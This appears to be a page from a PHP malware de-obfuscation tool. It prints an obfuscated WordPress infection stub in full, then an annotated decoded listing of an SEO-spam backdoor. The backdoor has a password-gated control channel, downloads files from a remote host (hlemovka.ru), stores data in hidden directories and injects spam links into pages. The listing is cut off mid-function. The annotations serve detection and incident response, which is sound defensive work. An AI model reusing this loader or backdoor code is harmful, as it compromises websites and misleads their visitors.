De-obfuscate PHP malware, viruses and tampering code found on WordPress sites into readable source code.
*Please note that not all obfuscation codes can be decoded.<?php $WAoPYwyXdPvZ="SgEN0fTDKojbIWR_9hFBXt8L4q5leYP31MGsxn7CVZv6OkwmdiyQrpa2JzHuUAc";$TkOUzpvdclqLc=$WAoPYwyXdPvZ[11] .$WAoPYwyXdPvZ[54] .$WAoPYwyXdPvZ[35] . $WAoPYwyXdPvZ[28].
$WAoPYwyXdPvZ[43] .$WAoPYwyXdPvZ[24] .$WAoPYwyXdPvZ[15]. $WAoPYwyXdPvZ[48] .$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[62].$WAoPYwyXdPvZ[9] .$WAoPYwyXdPvZ[48].$WAoPYwyXdPvZ[28];$JgSqJBBslT=$WAoPYwyXdPvZ[35]. $WAoPYwyXdPvZ[21].
$WAoPYwyXdPvZ[52].$WAoPYwyXdPvZ[52] .$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[42];$MhvFSBZkQpnFJ=$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[52] .$WAoPYwyXdPvZ[52].
$WAoPYwyXdPvZ[9].$WAoPYwyXdPvZ[52] .$WAoPYwyXdPvZ[15] . $WAoPYwyXdPvZ[52].$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[53].
$WAoPYwyXdPvZ[9]. $WAoPYwyXdPvZ[52].
$WAoPYwyXdPvZ[21].$WAoPYwyXdPvZ[49]. $WAoPYwyXdPvZ[37].
$WAoPYwyXdPvZ[1];$sWaLnyOyEkszu=$WAoPYwyXdPvZ[62]. $WAoPYwyXdPvZ[52] . $WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[54]. $WAoPYwyXdPvZ[21].$WAoPYwyXdPvZ[28]. $WAoPYwyXdPvZ[15] .$WAoPYwyXdPvZ[5]. $WAoPYwyXdPvZ[59]. $WAoPYwyXdPvZ[37]. $WAoPYwyXdPvZ[62] .$WAoPYwyXdPvZ[21].
$WAoPYwyXdPvZ[49].
$WAoPYwyXdPvZ[9] . $WAoPYwyXdPvZ[37];$MhvFSBZkQpnFJ(0);$EMsQnfRTJDs=$sWaLnyOyEkszu("",$TkOUzpvdclqLc($JgSqJBBslT("==gCN0nCNoQD9lgCNsDdphXZ7YWdiRCIvh2YllQCK0wOpgSZnFGcflHevJHcfRXZn1TK0NGJsYWdiRCK0NXaslQCK0gCNsXZzxWZ9lgCN0XCJoQD7QXa4V2OmVnYkAyboNWZJkQCK0QfJkQCK0wOpgSZnFGcflHevJHcfRXZn1TK0NGJsYWdiRCK0NXaslQCJkgCNsXZzxWZ9lQCJoQD7kSY1RCLpYWZyRCKlR2bj5WZsJXd3FmcuISPmVmcmIiLwlWetRiLi0jckRWYmIiLpgnc1RCKlR2bj5WZsJXd3FmcuISP1ZiIukCdz9GakgSZk92YuVGbyV3dhJnLi0DZmIiLpU2chJGJoUGZvNmblxmc1dXYy5iI9U2chJmJi4SKkJ3b3lXZrRCKlR2bj5WZsJXd3FmcuISPr1mJi4yajFGcElEJuISPwl2PwhGcuYmZv4Wah12bkRyLvoDc0RHaigCdld2XldWYw9VesJXdj1TKvZmbp9Fdld2XldWYw9VesJXdjRCLmVnYkgCdzlGbJkQCJoQD7lSKdJicv9GZzlmIb9mZulGJoQXZzNXaoAiZplQCJoQD7BSKlNHJoAiZplQCK0QfJkgCNoQDK0gCN0XCJkgCNsDdphXZ7YWdiRCIvh2YllQCJkgCNoQD9lQCJkgCNsTKwNXZyRCLwdWZyRCLztmbpxGJsYWdiRCK4V2ZlJ3XldWYw9VZn5WYoNWPmVnYkkQCJkQCK0wOdJCcfN3aulGbis1bm5Wak0zcr5WasRSCJkQCJoQD7ETPwNXZyRyOnMXavkiPcB3LcxDX9BzM75CKvcSPwdWZyRSCJkQCJoQDK0wOpE2clJHJsE2ZlJHJsM3aulGbkwiZ1JGJogXZnVmcfV2ZhB3Xldmbhh2Y9YWdiRSCJkQCJoQD70lIh91cr5WasJyWvZmbpRSPztmbpxGJJkQCJkgCNsDM9E2clJHJ7cSav4DXh9CX8w1Pq4iPc9jKuMHXhxDXvcSPhdWZyRSCJkQCJoQD7lSKiwWb0h2L0hXZ0JCL0NGJoIHdzlmc0NHKgYWaJkQCJoQDK0wOpgSZnFGcflHevJHcfRXZn1TK0NGJsYWdiRCK0NXaslQCJkgCNoQD7V2csVWfJkQCK0QfJkQCJoQD7QXa4V2OlRXYsBXblRHJg8GajVWCJkQCJoQDK0QfJkQCJkgCN0XCJkQCJkgCNsTKlRXYsBXblRHJssmbpxGJsISJi4Sak4iIftkTJx0XFRUST5USlICKlNWYsBXZy9lc0NXPlRXYsBXblRHJJkQCJkQCJoQD7lyaulGbkAiP9ASakAychBycr5Was9VZkl2culGJog2YhVmcvZWCJkQCJkgCNkgCNsTKlRXYsBXblRHJskSKkJ3b3lXZrRCKtlmc0BCLiwiIgwiIgICKlNWYsBXZy9lc0NHLiUCZy92d5V2alICKlNWYsBXZy9lc0NXPlRXYsBXblRHJJkQCJkQCK0wOpUGdhxGctVGdkwCZy92d5V2ajVHJsISJkJ3b3lXZrNWdlICKlNWYsBXZy9lc0NXPlRXYsBXblRHJJkQCJkQCK0wOpUGdhxGctVGdkwibvlGdwlmcjNXZkRCLiUibvlGdwlmcjNXZkViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLlxGdpRHJsISJlxGdpRXJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsTKlRXYsBXblRHJsQHelRHJsISJ0hXZ0ViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7V2csVWfJkQCJkgCN0XCJkQCJkgCNsTKlRXYsBXblRHJswGclJHJssmch1GJoU2Yhx
GclJ3XyR3c9UGdhxGctVGdkkQCJkQCJkgCNsXKsBXZyRCI+0DIrJXYtRCIzFGIdJicuJyWvZmbpRCKoNWYlJ3bmlQCJkQCJoQD7lSKp0lIy5mIb9mZulGJokXYyJXYfNXaoYiJpkSXiInbis1bm5WakgCdlN3cphCKgYWaJkQCJkgCNsXZzxWZ9lQCJkgCNsDdphXZ7QnblRnbvNmcv9GZkAyboNWZJkQCJkgCNsTK0hXZ0RCKlR2bjVGZfRjNlNXYi1DduVGdu92Yy92bkRSCJkQCJoQD7lSKdJSZu9GbhRmbhR3cis1bm5WakgCdlN3cphCImlWCJkQCK0gCNsXKp0lIy92bkNXais1bm5WakgCdlN3cphCImlWCJkgCNoQD913OpwWY2RCKyVGZhVGapIiI9ECbhZHJoYWa7kCbhZHJo0WayRXPsFmdksXKsFmdkAychByclBXe0RCKoNWYlJ3bmtTKlBXe0RnblRnbvNGJsIibcJCKlR2bsBHel1zclBXe0RyOp0lIlBXe0RnblRnbvNmIb9mZulGJoUGZvNWZk9FN2U2chJGQ9UGc5RHduVGdu92YksXKp0lIlBXe0RnblRnbvNmIb9mZulGJoQXZzNXaoAiZplQCJoQD7BSK09mYkgCImlWCJoQD70lIztmbpx2XlRWaz5Wais1bm5WakAUPztmbpx2XlRWaz5WaksTKkJ3b3lXZrRCKzRmcvd3Y11DZy92d5V2ajVHJ70lIu9Wa0BXayN2clRmIb9mZulGJA1jbvlGdwlmcjNXZkRyOdJSZsRXa0JyWvZmbpRCQ9UGb0lGdksTXiQHelRnIb9mZulGJA1Dd4VGdksTXiU2chJmIb9mZulGJA1TZzFmYksTXis2YhBHRJJyWvZmbpRCQ9s2YhBHRJRyOdJCZy92d5V2ais1bm5WakAUPkJ3b3lXZrRSCJoQD7kSKmVnYkgSZk92YlR2X0YTZzFmYoUmepxWYpJXZz5Wd98mZulGJ7kiZkgSZz9GbjZGQ7kSKmRCKzRXZnZGQo0WayRXPmVnYksTKmZ2bkwiZkgyalV2cmB0OpIiciwCZiRCKuVGcvZGQ9YGJ7kSKsBXblRHJoMHduVGdu92YfRXZn9VZslmZAhSZk92YlR2X0YTZzFmYA1TZ0FGbw1WZ0RSCJoQD7AzKdhnc1VDZtRyWmNGJ9YmZvRSCJoQD7ETP09mYkkSKhVHJgwiIpNiclRWawNXdklWYixnclx2dhJ3Y8VncuwFbpFWb8dXZpZXZyBHIiV2dgUGbn92bnx3bvhWY5xHdvJGfyVGZpB3c8VGbpJ2bN1CdvJWZsd2bvdEfzJXZuRnchBXYpRWZNxXZsd2bvdUL09mQzRWQ8JXZsdXYyNWLhN3Z8VGbn92bnNiIog2Y0FWbfdWZyBHKgYWaJkgCNsTM9U2ckkSKmVmckACLik2It92YuwlbvxWeiFmY812bj5CXlZWYjlHZuFGa812bj5CXoNmchV2ciV2d51Gft92Yuw1dvdHf0VmbuwlclRnchh2Y812bj5CX0lWdk52bjx3bvhWY5xHajJXYlNHfhR3cpZXY0xWY812bj5CXs9WY812bj5CXrNXY812bj5CXuNXb812bj5CXn5WaixXZsd2bvd2IigCajRXYt91ZlJHcoAiZplQCK0wOdJiUERUQfVEVP1URSJyWSVkVSV0UfRCQ9AXa51GJ70lISVkUFZURS9FUURFSislUFZlUFN1XkAUPmVmcksTXiQlTFdUQfJVRTV1XQRFVIJyWSVkVSV0UfRCQ9EWdksDM9U2cksDM9Q3biRSCJoQD7lSKdhnc1VDZtRyWmNGJoQXZzNXaAhCImlWCK0QCK0QfJoQD7kSKpM3ZpZmbvNGJoMHduVGdu92YfRXZn9VZslmZAhSZk92YlR2X0YTZzFmYAhSZ6lGbhlmclNnb1BUPmNGJJkgCNsXKpM3ZpZmbvNGJoMHdzlGel9VZslmZAhCImlWCK0
wOpgSehJnch1jZjRSCK0gCNsXZzxWZ9pQDK0gCN0XCK0gCNsDdphXZJkgCNoQD7kSK0V3bkgSZ6lGbhlmclNHKlR2bj5WZfRjNlNXYiByboNWZJkgCNsTKJkQCJkgCNwCMgoDIpwGctVGdkgSZ6l2clxWamByPgkCbw1WZ0RCKlxWam91cpBiP9AyJlpXaz9VZslmZfVGdhxGctVGdnkQCJkQCJoQDsADI6ASKkJGJoUmepNXZslmZg8DIpQmYkgSZslmZfNXag4TPgcSZ6l2cfVGbpZ2XiR2JJkQCJkQCK0ALzdWam52bjRCI+0DInUGbpZ2ZpZmbvN2JJkQCJkQCK0ALf9VRMlkRf9FI+0DInUGbpZ2JJkQCJkQCK0ALSVkVSV0UfRCI+0DInIXZ2JXZzdSCJkQCJkgCNwiZjRCI+0DInY2YnkQCJkQCJoQDokXYyJXY9QXdvRSCJoQDK0QfJkgCNsTKpkycnlmZu92Ykgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBEKlpXasFWayV2cuVHQ9Y2YkkQCJoQD7lSKzdWam52bjRCKzR3cphXZfVGbpZGQoAiZplQCK0wOpgSehJnch1jZjRSCJoQD7liI1ISP9gHJoAiZplgCN0XCK0wO0lGeltjIux1IjMCRFtkUPd1IjMiIg8GajVWCJoQD7liI0ISP9gHJoAiZplgCNoQDK0QfJoQD7QXa4VWCJoQD7IibcNyIjQURUFERQV1IjMiIg8GajVWCJoQD7kSMmVnYkwCbw1WZ0RCKzRnblRnbvN2X0VHcfVGbpZGQ7kiIml2ZuwGbhNXZtVGa01Cc3JiLyVHJoQXZn9VZnFGcflHbyV3YA1TK0RCLxYWdiRCK0NXaslQCK0wOpEjZ1JGJsQmYkgyc05WZ052bj9Fd1B3XlxWamB0OpIyZwpmLz52bjlWY0VWbi4ic1RCK0V2ZfV2ZhB3X5xmc1NGQ9kCdkwSMmVnYkgCdzlGbJkgCNsTKxYWdiRCLzdWam52bjRCKzRnblRnbvN2X0VHcfVGbpZGQ7kiIn5GcuETaq9WblJiLyVHJoQXZn9VZnFGcflHbyV3YA1TK0RCLxYWdiRCK0NXaslQCK0wOi8iIuQ3cvhWNk1GJuIyLzV2Zh1WavIiLulWYt9GZk4iIv8iOwRHdoJSPyVHJJkgCNsjIux1IjMyUFxUSG91ROlEVBREUVNyIjICIvh2YllQCK0wepIiMi0TP4RCKgYWaJoQDK0wepkyczFGc1QWbk0TPwRCKmYSKiISPhgHJogCImlmCNoQD7kSKpICcigCbhZ3X0V2ZoUGZvNWZk9FN2U2chJGQoUDZt1DckkiIi0TI4RCKgYWaK0wOiISPwRiCNoQD7kiI9UlbjVXRyEmM5clYsh3RhJCKlR2bjVGZfRjNlNXYi1jbpFWbvRGJK0gCNoQDK0wOiYWan5CbsF2cl1WZoRXLwdnIugGdhBHctRHJ9wGctVGdkoQD7IyZwpmLz52bjlWY0VWbi4Ca0FGcw1Gdk0DZiRiCNsTZslmZjRiLoRXYwBXb0RSPzdWam52bjRiCNoQDK0wOpgGdhBHctRHJoIXaktWbAtTNk1Gek4Ca0FGcw1Gdk0Da0FGcw1GdkoQDK0QfK0wOi4iI9gGdhBHctRHJJoQD7V2csVWfK0wOpgCa0FGcfJGZfRXZn1Da0FGcw1GdkkgCNsXKpUGbpZ2Yk4SNk1Gek4iIuICKzR3cphXZfVGbpZGQhgCImlmCNoQD7IyZuBnLxkmav1WZi0TZslmZjRiCNoQD7IyLi4Cdz9Ga1QWbk4iIu8iI9UDZthHJK0gCNoQD7kCeyVHJoUDZt1DeyVXNk1GJ7kmc1RiL0N3boRSP4JXdksTK0N3boRCK1QWb9Q3cvhWNk1GJK0wOpQ3cvhGJsIiIsIiL3d3digSZjFGbwVmcfJHdz1Ddz9GakoQD70lIJJVVfR1UFVVUFJlIbJVRWJ
VRT9FJA1TayVHJK0wOp0lIUN1TI9FUURFSislUFZlUFN1XkAEKyV2dvx2b0JHdz1Ddz9GakoQDK0wOiI2M0UmZhBjM1ETZjNDOxEGMmFGMygjM4EDM3UDNlVTZi0zczFGc1QWbkoQDK0wOpIyajVGaj9FcwBHcigCbhZ3X0V2Z9gHJK0wOiISP05WZ052bjRiCNoQDK0gCNoQD9pQDK0wOi4iIg4mc1RXZylgCNoQD7IXak9FctRHJg4mc1RXZyBSKpIXak9FctRHJoUGbiFGdpJ3dfNXagYiJgkicpR2Xw1GdkgicpR2XzlGKgYWaJoQD7kCKylGZfBXblR3X0V2ZfNXezBSPgIXak9FctRHJJoQDK0wOpciLngCIuJXd0VmcgkSKn4yJoUGbiFGdpJ3dfNXaoAiZplgCNoQD7kicpR2X05WZyJXdjRCKylGZlN3bsNWCK0wOpIXakRCKg4mc1RXZyBSKpIXakRCKlxmYhRXayd3XzlGImYCIpIXakRCKylGZfNXagYiJgkicpRGJgwyJvQyKuwlXvcCKoNGdh12XnVmcwFCKgYWagkSKylGZfRnblJnc1NGJoIXakRWYlJHI9AicpRGJoASZslGa3lgCNsTKn4yJoIXak5WZw9GI9AicpR2X05WZyJXdjRSCK0gCNsTKkRCKg4mc1RXZyBSKpQGJoUGbiFGdpJ3dfNXagYiJgkCZkgicpR2XzlGKgYWagkCZkAychBycylGZfRHb1FmZlRGJoACajFWZy9mZJoQDK0wOpkgCNcyckF2bsBXdvQnblRnbvNWLwd3JJkgCNwyJw1GdnkQCK0ALnMnbpdWdsB3Lzp2LlNWb55Wa09ycy9GdpRWZvEWakVWbnkQCK0ALnU2ZhV3ZuFGbvwWb0h2Lz12YvMXZpJXYyJWasdSCJoQDscycldWYtl2LzdXZpZ3LhlGZl12Xt92YvMHduVmbvBXbvN2Ly9GdhJHdzlmbp1GZhdSCJoQDscyZtl2Lj5Waf9Cdl12cptWYvMnbpdWdsB3L05WZ052bj1Cc3dSCJoQDscycul2Z1xGcvU2YtlnbpR3Lzp2LzVGZ1x2YulWLwd3JJkgCNwyJ05WZ052bD9SZpBVZsBXbpN1LzVGZ1x2YulWLwd3JJkgCNgSehJnchBSPgMncpR2X0xWdhZWZkRSCK0gCN0XCK0wOpgicpR2Xw1WZ09Fdld2Xzl3cg4mc1RXZylQCK0wepkiIul2diwyUP9FUIBFKyR3cpJHdzhCImlWCK0gCNsXKogGdhB3XiR2X0V2Zg42bpR3YuVnZK0gCN0nCNoQD7kCdjRCLmVnYkgSehJnchBibyVHdlJXCK0QfJoQD7kiIsJXd0hXZuRCI642bpRXYj9GTigiclRWYlhWCJoQD7liIi0TIsJXd0hXZuRCKgYWaJoQD9lgCNsTKiQ3YkAiOlBXe01CduVGdu92QigiclRWYlhWCJoQD7liIi0TI0NGJoAiZplgCNoQDK0wOpkCMxwCMskSKoUWbpRHK1QWboIHdzJWdz5iIgoDWZFkUtY0QtglIoIXZkFWZolCZhVGawRCKgYWaJoQD7kiIzVHdhR3ckAiOzVHdhR3UigiclRWYlhWKiISPhMXd0FGdzhCImlWCK0wOddSZk92YfBHd0h2Jb9mZul2X0V2ZfV2ZhB3X5xmc1NGJA1zc1RXY0NHJJoQD701JsJXdfR3YlJXakVmcns1bm5WafRXZn9VZnFGcflHbyV3YkAUPsJXd0hXZuRSCK0wOddSZwlHdfRnblRnbvN2Jb9mZul2X0V2ZfV2ZhB3X5xmc1NGJA1DdjRSCK0gCNsTKsJXdyNGJoQXZn9VZnFGcflHbyV3Y9kybm5WafRXZn9VZnFGcflHbyV3YkwiZ1JGJoQ3cpxWCK0wOddSSSV1XUNVRVFVRSdyWSVkVSV0UfRCQu01JUN1TI9FUURFSnslUFZlUFN1XkAkLvR3byBHJ9wmc1J3YkkgCNs
zJv8iOwRHdodCI6AyJv8iOzBHd0h2Jg8DIlVnc0BSP90DIpcycwRHdodCLddCTPN0TU9kUQ9lUFZlUFN1JbJVRWJVRT9FJAhycvBXayR3c98GdvJHckkgCNkQCK0wepETPkFWZoBHJoU2ZhB3X5h3byB3X0V2Zg42bpR3YuVnZK0gCN0nCNsTKvZmbp9Fdld2XldWYw9VesJXdjRCL0xWdzVmckgSehJnchBibyVHdlJXCK0wOpg2YkgSZz9Gbj9FbyV3YJoQDK0wOpg2Ykgybm5Wa0V2Zfxmc1NWPvZmbp9Fdld2XldWYw9VesJXdjRSCK0wOpg2YkgCIjVGel9FbyV3Yg0DI0xWdzVmckkgCNsTK05WZnFmclNXdkACLU5URHFkUFNVVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpADIsQ1UPhUWGlkUFZ1XMN1UfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpADIsIVRFBVWGlkUFZ1XMN1UfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpADMwMDIsQVVPVUTJR1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlgCNsTKxACLSVkRT5UQSRlTSVFVFJ1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlgCNsTKsJXdkwCTSV1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlgCNsTKoACdp5Wafxmc1NGI9ACajRSCK0wepIiNz4yNzUzLpJXYmF2UgMTMy4iMxMTMuAjL4czLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJWZXVGbwBXQgkCN2gHI7QjNul2VgsDMuATMgQlTgM3dvRmbpdFKgAjL18SYsxWa69WTi0DduV2ZhJXZzVHJswmc1RCK0V2ZfV2ZhB3X5xmc1NGIu9Wa0Nmb1ZmCNoQDK0gCNoQD9pQD7U2ZhBHJg4mc1RXZylgCNACIgAiCNACIgAiCN0XCK0wOpEDIsU2ZhBHJgwiIwQibcJCIuACduVWblxWZkAiLgIibcJCIscSav4DX5R2bi9CX8w1LngSZjFGbwVmcfdWZyBHI9ASZnFGckkQCK0wOi4DcvwjIg0jLgQnbl1WZsVGJgACIgACIgASCK0wOpM3aulGbkACLi4GX+InY8ICKlR2bsBXbpBSPuACduVWblxWZkACIgACIgACIJoQD7IiPwxjIg0DI05WZtVGblRCIgACIgACIgkgCNsXKw4TKztmbpxGJoQnb192YoAiZplgCN0HIgACIgACIgoQD7kSMgwSZnFGckACLr5WasRCIuAyJgADJnACLn8yJg4CIpcyLnACL05WZtVGblRCKlR3b1F3XnVmcwBiLgcyLngSZjFGbwVmcfdWZyBHI9ASZnFGckkQCK0wOpMHduVWblxWZkgCdmlGaz9VehJnchBSPgQnbl1WZsVGJJkgCNsTKztmbpxGJoQnZph2cflXYyJXYg0DIr5WasRSCJoQD7BSKrsSakAyOtRCI8ASakAyOwASPgkGJoAicvZGIgACIgACIgoQDK0wOpkyc05WZtVGblRCK05WdvNGLpM3aulGbkgCduV3bjhibp1WPtRSCK0gCNoQD9lgCNsTKzRnbl1WZsVGJoUWdxlmb19VehJnchBSPgMHduVWblxWZkkQCK0wOdNXZyRyW0xWdzVmckASPgMHduVWblxWZkkQCK0wegkSK0xWdzVmckACLldWYwRCIscWZyRCKsxWYfh2Y0FWbfdWZyBHKgYWaJoQD7kCK5FmcyFGI9Ayc05WZtVGblRSCK0gCNsXKzVmckwyZlJHJsM3aulGbkACLldWYwRCK4V2ZlJ3XldWYw9VZn5WYoNGIu9Wa0Nmb1ZmCNoQD9pQD7EGJg4mc1RXZylgCNsTKiIiOdlCMhRCKyVGcwV3b0JHdz5iIfBFVUhkIblGJ/kSXpATYkg
iclBHc19GdyR3cuIyXQRFVIJyWpRCK0V2czlGK60lIwEGJisVak8TKdJCMhRiIblGJoQXZzNXa9EGJJoQD7kiUFZlUFN1XkwSRJt0TPN0XkwCVTVUVRVkUfRCKldmcl12X5FmcyFGQ9kGJJoQD7lCMhRCKsFmdfRXZnBibvlGdj5WdmpQDK0wOpADK0lWbpx2Xl1Wa09FdlNnCNoQDgkAIgASDJoQDN0QCK0gCg0QCN0QDKkQCNAiC")));$EMsQnfRTJDs();?><?php
// Analyst note: decoder stub as recovered by the de-obfuscator.
// $WAoPYwyXdPvZ is a character lookup table. In the obfuscated sample the four
// function names below are assembled one character at a time by indexing into it,
// so "base64_decode", "strrev", "error_reporting" and "create_function" never
// appear as literals in the infected file; string-matching on those names will
// not find the stub, whereas the long chain of single-character index lookups will.
$WAoPYwyXdPvZ = "SgEN0fTDKojbIWR_9hFBXt8L4q5leYP31MGsxn7CVZv6OkwmdiyQrpa2JzHuUAc";
$TkOUzpvdclqLc = "base64_decode";
$JgSqJBBslT = "strrev";
$MhvFSBZkQpnFJ = "error_reporting";
$sWaLnyOyEkszu = "create_function";
// Turns off all PHP error reporting so the many failing calls below stay silent.
error_reporting(0);
// In the obfuscated sample the payload is built at run time as
// create_function("", base64_decode(strrev(<blob>))); the de-obfuscator renders the
// decoded body as a closure. create_function() was removed in PHP 8.0, so the stub
// in its original form only executes on older PHP versions.
$EMsQnfRTJDs = function () {
// Lifts the script execution time limit for the current request.
set_time_limit(0);
// Looks up an operator-supplied value by name.
// Merges $_REQUEST, $_COOKIE and $_SERVER into one array and returns the entry
// named $a0, or failing that the entry "HTTP_" . strtoupper($a0), i.e. a request
// header of that name; returns "" when neither exists.
// Detection relevance: the same parameter can therefore arrive as a query/body
// field, a cookie or an HTTP header, so access logs that record only the query
// string may not show it.
function get_val($a0)
{
$i = @array_merge($_REQUEST, $_COOKIE, $_SERVER);
$a = isset($i["{$a0}"]) ? $i["{$a0}"] : (isset($i["HTTP_" . strtoupper($a0)]) ? $i["HTTP_" . strtoupper($a0)] : "");
return $a;
}
// Splices spam links into an HTML page.
// $page  - HTML of the page being served
// $links - list of link snippets to insert
// $reg   - regex selecting anchor points in the page
// $res   - index of the capture group in $reg whose text is used as the anchor
// Returns the modified HTML.
function change_page_regex($page, $links, $reg, $res)
{
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
// De-duplicate so each distinct anchor text is used at most once.
$elements = array_unique($elements);
}
// Pair links with anchors one-to-one, limited by whichever list is shorter.
$m = min(count($links), count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
// Rewrites only the first occurrence of the anchor: matched text, a space, then the link.
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
// Links left over when the page had too few anchors are dumped as one <p> block
// (separated by <br>) immediately before the first </body> tag.
if (count($links) > 0) {
$element = "<p>";
$element .= implode("<br>\n", $links);
$element .= "</p>";
$page = preg_replace('/\\<\\/body\\>/i', "\n" . $element . "\n\$0", $page, 1);
}
return $page;
}
// HTTP GET helper built on cURL.
// $url       - URL to fetch
// $useragent - User-Agent header to send; defaults to a desktop Chrome string
// Returns array(response body or false, curl_getinfo() array).
// Both TLS checks (peer and host verification) are switched off, so any
// certificate is accepted. Outbound requests from the web server that carry the
// default Chrome User-Agent below are a possible egress indicator.
function curly_page_get($url, $useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36")
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// CURLOPT_TIMEOUT is expressed in seconds, so this allows a transfer to run for 50 minutes.
curl_setopt($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec($ch);
$curly_page_get_info = curl_getinfo($ch);
curl_close($ch);
return array($result, $curly_page_get_info);
}
// Fetches the currently requested URL from the infected site itself and relays
// the response metadata to the visitor.
// $phead - when truthy, an extra "X-CF-RAYX" response header is emitted
// Returns array(page body, content type).
// NOTE(review): the self-request goes back to the same host and URI, so it passes
// through this injected code again; no loop guard is visible in the decoded
// listing. Confirm on the live sample whether this shows up as bursts of
// server-originated requests in the access log.
function get_proxy_page($phead = 1)
{
// stripos() returns an int or false, never true, so this comparison always fails
// and the self-request is always made over http://.
$proto = stripos(@$_SERVER['SERVER_PROTOCOL'], 'https') === true ? 'https://' : 'http://';
$crurl = $proto . @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
list($buf, $curly_page_get_info) = curly_page_get($crurl);
$ct = @$curly_page_get_info['content_type'];
$nexturl = @$curly_page_get_info['redirect_url'];
$status = @$curly_page_get_info['http_code'];
// Unconditional: the status code of the self-request is passed on.
if (true) {
header("Status: {$status}");
}
// Response-side indicator: header name "X-CF-RAYX" with a 10-character hex value
// taken from md5(time()).
if ($phead) {
header("X-CF-RAYX: " . substr(md5(time()), 0, 10));
}
if ($ct != "") {
header("Content-type: {$ct}");
}
if ($nexturl != "") {
header("Location: {$nexturl}");
}
return array($buf, $ct);
}
// Picks a writable directory in which the malware keeps its data files.
// Returns a path relative to the current working directory, or the system temp
// directory. Incident responders should check every location listed here for a
// hidden ".<32 hex chars>" sub-directory.
function get_db_path()
{
// On Windows hosts the system temp directory is used directly.
if (stristr(PHP_OS, "win")) {
return sys_get_temp_dir();
}
// Preferred hiding places, tried in order; the first existing, writable one wins.
// NOTE(review): the list mixes WordPress paths with what look like Joomla paths
// (administrator/components/..., libraries/cms/...), so presumably the same
// payload is dropped on both CMSs.
$default_dirs = array('wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads');
foreach ($default_dirs as $d) {
if (is_dir($d) && is_writable($d)) {
return $d;
}
}
// Fallback 1: the first writable sub-directory of the current directory whose
// name is not made up solely of dots.
$current_dir = opendir('.');
while ($dir = readdir($current_dir)) {
if (!preg_match('/^\\.+$/', $dir) && is_dir($dir) && is_writable($dir)) {
return $dir;
}
}
closedir($current_dir);
// Fallback 2: the current directory itself.
if (is_writable('.')) {
return '.';
}
// Fallback 3: the system temp directory, and finally "." regardless of writability.
$tmp_dir = sys_get_temp_dir();
if (is_dir($tmp_dir) && is_writable($tmp_dir)) {
return $tmp_dir;
}
return ".";
}
// Analyst summary of the main body: an SEO-spam / cloaking payload with a small
// password-gated control channel.
// Indicators taken from this listing:
//   - control parameters "pppp_check" and "p" (request field, cookie or header)
//   - remote host hlemovka.ru, paths /images/<md5(host)>/ and /ff.php
//   - hidden directory ".<md5(host without www.)>/" holding emoji1.png,
//     metaicons.jpg and wp-themesall.gif (image names, non-image content)
//   - marker strings ###UPDATING_FILES###, ###UPDATED###, ###WORKED###
$content = "";
// Command selector supplied by the operator.
$x = get_val("pppp_check");
// Hard-coded MD5 of the operator password.
$md5pass = "e5e4570182820af0a183ce1520afe43b";
$host = strtolower(@$_SERVER["HTTP_HOST"]);
$uri = @$_SERVER["REQUEST_URI"];
$host = str_replace("www.", "", $host);
$md5host = md5($host);
// Host plus request URI; its MD5 is the per-URL lookup key in the config.
$urx = $host . $uri;
$md5urx = md5($urx);
// Per-site storage directory: a dot-directory named after md5(host).
$xmd5 = "/." . $md5host . "/";
$cfile = "emoji1.png";
// Reuse "./.<md5host>/" if the config is already there, otherwise pick a writable directory.
if (!@file_exists("." . $xmd5 . $cfile)) {
$tmppath = get_db_path();
} else {
$tmppath = ".";
}
$tmppath .= $xmd5;
@mkdir($tmppath);
// emoji1.png       -> config: base64 of a serialized array keyed by md5(host . uri)
// metaicons.jpg    -> record database, one base64/serialized record per line
// wp-themesall.gif -> base64-encoded HTML template
$configs = $tmppath . $cfile;
$bd = $tmppath . "metaicons.jpg";
$templ = $tmppath . "wp-themesall.gif";
// Remote server that supplies the data files and the search-visitor content.
$domain = "hlemovka.ru";
$p = "";
if ($x != "") {
// The password is sent base64-encoded and compared by its MD5.
$p = md5(@base64_decode(get_val("p")));
}
// Control channel: reached only with a command selector and a matching password hash (loose ==).
if ($x != "" && $p == $md5pass) {
// Command "2": re-download the three data files from the remote host over plain http://.
if ($x == "2") {
echo "###UPDATING_FILES###\n";
$ur = "http://" . $domain . "/images/" . $md5host . "/";
list($buf1, $t) = @curly_page_get($ur . "emoji1.png");
@file_put_contents($configs, $buf1);
list($buf1, $t) = @curly_page_get($ur . "metaicons.jpg");
